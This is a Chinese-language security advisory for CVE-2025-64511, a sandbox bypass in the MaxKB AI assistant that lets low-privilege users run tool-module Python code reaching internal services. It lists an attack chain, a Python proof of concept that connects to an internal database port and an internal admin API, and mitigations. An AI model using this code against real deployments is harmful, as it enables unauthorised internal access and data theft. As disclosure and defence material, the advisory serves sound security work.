CVE-2025-64511: MaxKB AI助手沙箱绕过导致内网服务访问漏洞

漏洞信息

漏洞编号

CVE-2025-64511

漏洞类型

沙箱绕过/访问控制

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MaxKB

漏洞概述

MaxKB是一款面向企业的开源AI助手系统。该漏洞存在于2.3.1之前的版本中，攻击者可以利用工具模块中的Python代码访问内部网络服务（如数据库），尽管系统声称进程运行在沙箱环境中。攻击者通过构造特定的Python代码，能够绕过沙箱限制，实现对内部敏感服务的未授权访问，包括但不限于数据库连接、内部API调用等。此漏洞需要低权限用户即可实施，无需用户交互，CVSS评分7.4，属于高危漏洞。攻击者可能利用此漏洞窃取敏感数据、横向移动或进一步渗透内部网络。

技术细节

该漏洞的核心问题在于MaxKB的沙箱隔离机制存在缺陷。在工具模块中，系统允许用户编写和执行Python代码来处理特定任务，理论上这些代码应该在受限的沙箱环境中运行以防止恶意操作。然而，由于沙箱实现不完善，攻击者可以通过特定的Python标准库函数（如socket、urllib、requests等）发起网络请求，从而访问本应隔离的内部网络服务。攻击者可以构造类似import socket;socket.create_connection(('internal-db-host',3306))的代码直接连接内部数据库，或使用urllib访问内网API端点。沙箱未能有效拦截这些网络访问操作，导致安全边界被突破。此漏洞允许低权限用户获取对内部敏感资源的访问权限，可能导致数据泄露或进一步的攻击路径。

攻击链分析

STEP 1

步骤1

攻击者获取MaxKB系统低权限账户

STEP 2

步骤2

登录系统后访问工具模块（Tool Module）

STEP 3

步骤3

构造包含Python代码的payload，利用socket、urllib等库发起网络请求

STEP 4

步骤4

绕过沙箱限制，直接连接内部数据库或访问内部API服务

STEP 5

步骤5

窃取敏感数据或利用获取的信息进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# MaxKB CVE-2025-64511 PoC - Sandbox Bypass to Internal Service Access
# Requires low-privilege user access to MaxKB tool module

import socket
import urllib.request

def access_internal_db():
    """Attempt to connect to internal database service"""
    try:
        # Target internal database host (example)
        db_host = 'internal-db.local'
        db_port = 3306
        
        # Create socket connection to internal database
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((db_host, db_port))
        
        if result == 0:
            print(f"[+] Successfully connected to internal database at {db_host}:{db_port}")
            # Could execute database queries here
            return True
        else:
            print(f"[-] Connection failed or service not accessible")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

def access_internal_api():
    """Attempt to access internal API endpoint"""
    try:
        # Target internal API (example)
        internal_api = 'http://internal-api.local:8080/admin/users'
        
        # Make HTTP request to internal service
        req = urllib.request.Request(internal_api)
        response = urllib.request.urlopen(req, timeout=5)
        
        print(f"[+] Successfully accessed internal API: {internal_api}")
        print(f"[+] Response: {response.read()}")
        return True
    except urllib.error.URLError as e:
        print(f"[-] Internal API access failed: {str(e)}")
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == '__main__':
    print("MaxKB Sandbox Bypass PoC - CVE-2025-64511")
    print("This PoC demonstrates ability to access internal services")
    print("-" * 50)
    access_internal_db()
    access_internal_api()

影响范围

MaxKB < 2.3.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用工具模块的代码执行功能；2) 对MaxKB服务器实施严格的网络隔离，仅允许必要的出口流量；3) 监控和限制对内部网络服务的访问尝试；4) 增强用户权限管理，确保低权限用户无法访问敏感工具模块。